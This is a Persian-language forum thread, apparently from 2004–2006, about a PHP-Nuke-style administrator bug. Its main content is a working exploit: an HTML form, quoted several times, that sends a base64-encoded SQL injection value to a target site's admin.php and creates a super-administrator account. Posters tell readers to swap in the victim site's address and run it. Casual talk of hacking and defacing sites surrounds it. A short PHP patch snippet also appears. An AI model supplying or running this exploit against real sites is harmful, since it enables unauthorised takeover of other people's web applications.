۱۹-شهریور-۱۳۸۳, ۱۲:۲۵:۰۳
صفحهها: 1 2
۱۹-شهریور-۱۳۸۳, ۲۲:۲۲:۵۴
amirjan نوشته است:اه راست ميگه ها !! اينجا هم هست ! :
ايناها --> http://www.mantralab.org/modules.php/mod...wAdmin+Bug
اينجا اين باگ رو انتشار داده...اوكي
۲۰-شهریور-۱۳۸۳, ۱۵:۱۷:۰۲
سلام لازم ديدم چند تا مطلب رو دوباره توضيح بدم
1.اين هشي كه توي خود برنامه هست مستر حساب ميشه مثل لينكي كه اومده بود و دو سوته ادمين ميساخت اون هم از همين هش استفاده شده بود حالا اگر هم جواب نداد ميتونيد هش ادمين رو جايگزين كنيد اما با همين هش هم ميشه
2. من خودم به شخصه بر اين اعتقاد هستم اكسپوليتي ه پخش شد ديگه صاحب نداره مثلا توي سكيوريتي فكوس كه اومد توي اي سكيوريتي هم مياد توي اين سايت هم ميادپ و........ و هر كسي براش يك منبعي رو اعلام ميكنه پس منبع واقعي هيچ وقت معلوم نميشه
3. عزيز جان دليل نميشه چون توي اين سايت بوده منبع هم اينجا باشه ميخواي 10 نا لينك بدم كه توي اونا هم باشه؟
4.در مورد اشيانه تا جاي كه من بهزاد رو ميشناسم سايني رو داغون نكرده فقط صفحه اول رو عوض كردن
5. تصميم گرفتم ديگه اكسپوليت نذارم جاي بنا به دلايلي
6. حواستون به جاهاي كه هك ميكنيد باشه دليلش رو گمونم متوجه بشيد
7.فعلان باي
ساسان
1.اين هشي كه توي خود برنامه هست مستر حساب ميشه مثل لينكي كه اومده بود و دو سوته ادمين ميساخت اون هم از همين هش استفاده شده بود حالا اگر هم جواب نداد ميتونيد هش ادمين رو جايگزين كنيد اما با همين هش هم ميشه
2. من خودم به شخصه بر اين اعتقاد هستم اكسپوليتي ه پخش شد ديگه صاحب نداره مثلا توي سكيوريتي فكوس كه اومد توي اي سكيوريتي هم مياد توي اين سايت هم ميادپ و........ و هر كسي براش يك منبعي رو اعلام ميكنه پس منبع واقعي هيچ وقت معلوم نميشه
3. عزيز جان دليل نميشه چون توي اين سايت بوده منبع هم اينجا باشه ميخواي 10 نا لينك بدم كه توي اونا هم باشه؟
4.در مورد اشيانه تا جاي كه من بهزاد رو ميشناسم سايني رو داغون نكرده فقط صفحه اول رو عوض كردن
5. تصميم گرفتم ديگه اكسپوليت نذارم جاي بنا به دلايلي
6. حواستون به جاهاي كه هك ميكنيد باشه دليلش رو گمونم متوجه بشيد
7.فعلان باي
ساسان
۲۵-دى-۱۳۸۴, ۱۵:۴۴:۱۵
4shir نوشته است:خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم
اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيدکد:<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
</body>
</html>
يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
منبع هم اشيانهsssdsfsfgsdfgdvdfgdfgsdfgdgdfgfddfgکد:if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
۲۵-دى-۱۳۸۴, ۱۵:۴۹:۰۰
[quote="4shir"]خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم
اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد
يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
[code]
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
کد:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
</body>
</html>يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
[code]
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
۲۵-دى-۱۳۸۴, ۱۵:۵۱:۵۱
[quote="4shir"]خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم
اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد
يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
منبع هم اشيانه
کد:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
</body>
</html>يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
کد:
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}۲۵-دى-۱۳۸۴, ۱۹:۴۶:۵۲
mehrad-a نوشته است:دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.از كپي رايت آشيانه حرف مي زني ؟ آشيانه اي كه خودش باگ كشف شده رو ميدزده به اسم خودش ميزنه ؟
من يكي اينا رو ميشناسم ! :evil:
۲۶-دى-۱۳۸۴, ۰۸:۵۶:۳۸
آقاي black_phantom نبش قبر ميكني؟
صفحهها: 1 2